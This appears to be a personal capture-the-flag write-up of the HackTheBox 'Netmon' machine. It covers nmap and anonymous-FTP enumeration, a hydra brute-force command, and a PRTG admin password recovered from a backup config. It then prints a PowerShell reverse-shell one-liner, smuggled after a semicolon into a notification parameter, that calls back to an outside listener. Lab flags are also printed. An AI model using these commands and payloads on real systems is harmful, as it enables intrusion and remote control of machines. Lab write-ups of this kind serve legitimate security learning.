Netmon

Easy box from HTB, quite frankly user flag could have been hidden a bit more. Enumerating the server to obtain the bak files was quite a challenge. RCE at the end was basic

Learning:

Enumeration on FTP
Credential Hunt
Executing RCE manually or using msfconsole

Enumeration

nmap 10.129.230.176        
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-01-25 13:06 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.029s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Check ftp

└─$ nmap 10.129.230.176 -p 21 -A
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-01-25 13:08 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT

User.txt lives can be found on Public user when you navigate through the FTP

cat user.txt
6cf59125ff605c57eb6dc38a3b9cfce5

Enumerating ftp to obtain user credentials:

Goal attempt to find old bak files
Find old config files

Users:

netmon\\administrator

Bruteforce Attempt - Did not work

hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.230.176 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^&loginurl=:Your login has failed"

Navigating on FTP again looking for credential:

cd "Program Files (x86)\\PRTG Network Monitor\\"
# Nothing note worth the time in that directory 

cd "Program Files (x86)\\Windows"
# In program files we are heading to Windows
02-25-19  09:54PM              1189697 PRTG Configuration.dat

note: user common UID 100

Obtained from
/ProgramData/Paessler/PRTG Network Monitor

Get PRTG Configuration.old.bak

User Credential Found:

User: prtgadmin
Pass: PrTg@dmin2019

RCE

Shell Attempt:
windows/http/prtg_authenticated_rce

Another way obtaining RCE

In the PRTG Admin Panel head to:

Setup
Account Settings
Notifications
Inside the Notification setting head to Execute Program
Execute Program setting

test.txt;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.33',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

In the parameter Key input the Rev-Shell
Make sure you select Demo exe notification - outfile.ps1in the Program File parameter
Save
Create netcat session `nc -lvnp 1234`
Ones uploaded Head to notifications
Click our created notification name pwn
- On the far right hand side you will see a small box with a pen click that
- Click the bell (if you hover on it it will say send notification)
- RCE done!
Follow the block dots if lost

Popped it.

C:\\Users\\Administrator\\Desktop>type root.txt
type root.txt
9282597bae369ff9a75033e99ddc5bcd

PreviousPOP Restaurant NextTryHackMe

Last updated 1 year ago